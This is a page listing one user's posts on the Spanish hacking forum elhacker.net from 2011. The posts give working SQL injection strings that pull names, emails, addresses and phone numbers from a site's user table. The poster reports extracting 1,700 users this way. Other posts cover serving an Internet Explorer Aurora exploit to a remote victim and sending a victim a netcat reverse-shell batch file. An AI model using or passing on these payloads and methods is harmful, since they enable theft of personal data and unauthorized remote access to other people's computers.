elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Como proteger una cartera - billetera de Bitcoin


  Mostrar Mensajes
Páginas: [1] 2 3
1  Seguridad Informática / Seguridad / Re: Acceso a mi cuenta facebook, para robarme fichas de poker en: 13 Agosto 2011, 17:24 pm
Tal vez los que hicieron la aplicación hizieron un BUG apropósito , y  asi podrian sacar el dinero de las cuentas que tengan mucho dinero sin que nadie lo pueda evitar....
2  Seguridad Informática / Hacking / Re: [Metasploit + 0-day IE] Exploit IE_Aurora en: 12 Agosto 2011, 21:47 pm
Excelente . Una duda:  si quiero enviarle la página a  alguien que este en una pc que no este en lan con migo ¿tengo que usar mi IP pública verdad?? (anteriormente configurada)
3  Seguridad Informática / Nivel Web / Re: Obtener todos los datos al mismo tiempo con SQLinjections en: 26 Julio 2011, 14:48 pm
No te lo va a dar en una petición, pero group_concat saca varios datos a la vez

(Creo que me había expresado mal, lo que quería sacar son los usuarios(con todos los datos) al mismo tiempo )

Funciono casi perfecto!!! Lo único malo es que me imprimía de a 10 usuarios y nada más, pero lo solucione con un "where+id<=50"  ---->  "where+id<=60"

Muchas gracias
4  Seguridad Informática / Nivel Web / Re: [SQLi]Problema al obtener informationschema.tables en: 26 Julio 2011, 14:38 pm
@Lavacaloca, por si no leíste se dejo claro que no existe information_schema.

Perdón, no sabía que esa versión no tiene information_schema , no había entendido cuando lo dijiste
5  Seguridad Informática / Nivel Web / Obtener todos los datos al mismo tiempo con SQLinjections en: 24 Julio 2011, 17:54 pm
Hola a todos, sigo con dudas de SQL injections (que no pude resolver solito).

Si quiero imprimir en pantalla todos los datos de todos los usuarios al mismo tiempo,¿ como tendría que hacer?
 Por que puedo hacerlo de 1 en 1 , con un "limit+1,1--"
Código: [Seleccionar]
(id=-1+union+all+select+1,concat(nombre,0x3a3a,apellido1,0x3a3a,apellido2,0x3a3a,username,0x3a3a,email,0x3a3a,empresa,0x3a3a,direccion,0x3a3a,telefono,0x3a3a,localidad,0x3a3a,codigo_postal,0x3a3a,pais),3,4,5,6,7+from+usuarios+limit+1,1--
Código: [Seleccionar]
(id=-1+union+all+select+1,concat(nombre,0x3a3a,apellido1,0x3a3a,apellido2,0x3a3a,username,0x3a3a,email,0x3a3a,empresa,0x3a3a,direccion,0x3a3a,telefono,0x3a3a,localidad,0x3a3a,codigo_postal,0x3a3a,pais),3,4,5,6,7+from+usuarios+limit+2,1--
, pero el problema es que son 1700 usuarios que quiero imprimirle los datos, ¿se puede todos al mismo tiempo?
6  Seguridad Informática / Nivel Web / Re: [SQLi]Problema al obtener informationschema.tables en: 24 Julio 2011, 17:52 pm
Y porque no haces:

id='+union+select+all+1,table_name,3,4,5,6,7+from+information_schema.tables--

¿?¿?

(después pones id='+union+...+1,group_concat(column_name),3,4,5,6,7+from+information_schema.columns+where+table_name=char(TEXTO EN ASCCI)--)
7  Seguridad Informática / Hacking / Re: Problema con NetCat en: 26 Mayo 2011, 21:46 pm
Te lo está bloqueando el firewall, tendrias que probar con reverse-shell ;)

(sin mencionar que tenes que tener a "alguien" a quien conectarte)
8  Comunicaciones / Redes / Re: Problema con el Netcat en: 24 Mayo 2011, 00:57 am
Hola! prueba desactivando el firewall.
A todo esto, que SO usas?

Saludos!

Tengo Windows, y uso el Xp firewall commander. Ya probé desactivando el firewall pero no funciona, tal vez deba probar de nuevo por las dudas.
9  Comunicaciones / Redes / Re: Problema con el Netcat en: 21 Mayo 2011, 22:02 pm
tienes que mandarle tu ip publica y abrir los puertos en tu router, no en tu firewall

Tengo Módem no router :/
10  Seguridad Informática / Hacking / Re: Jugando con netcat en: 20 Mayo 2011, 23:07 pm
Al fin página 42!!!! Después de 3 interrumpidos días conseguí leer todo el post, y aún así no puedo solucionar mi problema (aquí va):

Mi problema es el siguiente: el netcat no me funciona. Lo que pasa es que yo hago todo lo de los tutoriales , y a la hora de mandárselo a una víctima, aún cuando abre el archivo con el nc + un .bat ( reverse shell), mi netcat se queda en "listening" y no se recibe la conexión. Ya probé con reverse shell y con pipes , pero no funcionan.

Supongo que tengo que abrir un puerto , pero ya lo intente en el Firewall, y a pesar de que esta "creado" y "activado" no funciona. Escanee mi Ip en busca de puertos,y tenias 3, los cuales aun que los ponga en el nc no me funciona.

Les agradecería que me puedan ayudar.

PD: tengo un módem Huawei echolife hg520c, supongo que no debo abrir los puertos por el módem , ¿o si? (es de  speedy)
Páginas: [1] 2 3
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines